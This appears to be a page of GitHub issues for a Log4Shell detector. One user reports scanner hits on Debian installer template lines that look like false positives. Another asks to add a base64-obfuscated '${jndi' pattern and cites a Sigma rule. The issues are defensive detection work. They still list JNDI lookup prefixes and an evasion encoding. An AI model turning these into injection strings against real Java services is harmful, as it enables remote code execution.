[!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 65224 DEOBFUSCATED_STRING: ${jndi:rmi: LINE: Extended_description-ku.UTF-8: Cîhaza ku hatiye hilbijartin partîsiyonên ji bo cîhazên RAiD dihundirîne. Ew cîhaz û partîsiyon dê werin rakirin:\n\nCîhaza Software RAID li bêr rakirinê ye: ${REMOVED_DEVICES}\n\nPartition ji hêla van cîhazên RAID ve hat bikaranîn: ${REMOVED_PARTITIONS}\n\nNîşe: Her wisa evê her tim hemû daneyên li ser cîhazên RAID yên nivîsbarî jê bibe.
[!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58996 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-sl.UTF-8: Povzetek trenutne nastavitve LVM:\n\n Prosti fizični nosilci:  ${FREE_PVS}\n Uporabljeni fizični nosilci:  ${USED_PVS}\n Skupine nosilcev:          ${VGS}\n Logični nosilci:        ${LVS}
[!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58910 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-eo.UTF-8: Resumo de la nuna LVM-agordo:\n\n Liberaj Konkretaj Datumportiloj:  ${FREE_PVS}\n Uzataj Konktretaj Datumportiloj:  ${USED_PVS}\n Datumportilaj Grupoj:             ${VGS}\n Logikaj Datumportiloj:            ${LVS}

[!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 65224 DEOBFUSCATED_STRING: ${jndi:dns: LINE: Extended_description-ku.UTF-8: Cîhaza ku hatiye hilbijartin partîsiyonên ji bo cîhazên RAiD dihundirîne. Ew cîhaz û partîsiyon dê werin rakirin:\n\nCîhaza Software RAID li bêr rakirinê ye: ${REMOVED_DEVICES}\n\nPartition ji hêla van cîhazên RAID ve hat bikaranîn: ${REMOVED_PARTITIONS}\n\nNîşe: Her wisa evê her tim hemû daneyên li ser cîhazên RAID yên nivîsbarî jê bibe.
[!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58996 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-sl.UTF-8: Povzetek trenutne nastavitve LVM:\n\n Prosti fizični nosilci:  ${FREE_PVS}\n Uporabljeni fizični nosilci:  ${USED_PVS}\n Skupine nosilcev:          ${VGS}\n Logični nosilci:        ${LVS}
[!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58910 DEOBFUSCATED_STRING: ${jndi:dns: LINE: Extended_description-eo.UTF-8: Resumo de la nuna LVM-agordo:\n\n Liberaj Konkretaj Datumportiloj:  ${FREE_PVS}\n Uzataj Konktretaj Datumportiloj:  ${USED_PVS}\n Datumportilaj Grupoj:             ${VGS}\n Logikaj Datumportiloj:            ${LVS}

In addition, the file has not been touched since 2015:

-rw------- 1 root root 14M Mar 18  2015 /var/log/installer/cdebconf/templates.dat

Everything else, including your quick tests to check for log4j (thanks very much for those, too!), indicates that our systems should hopefully be unaffected by the log4j vuln.

Best wishes, Rob

opened by rennis250 2

Add pattern '${base64:JHtqbmRp'

I request to add pattern ${base64:JHtqbmRp which is evaluated to ${jndi. I think with the current algorithm, the detector can not detect these kind of patterns.

Ref https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j_fields.yml#L40

opened by baonq-me 7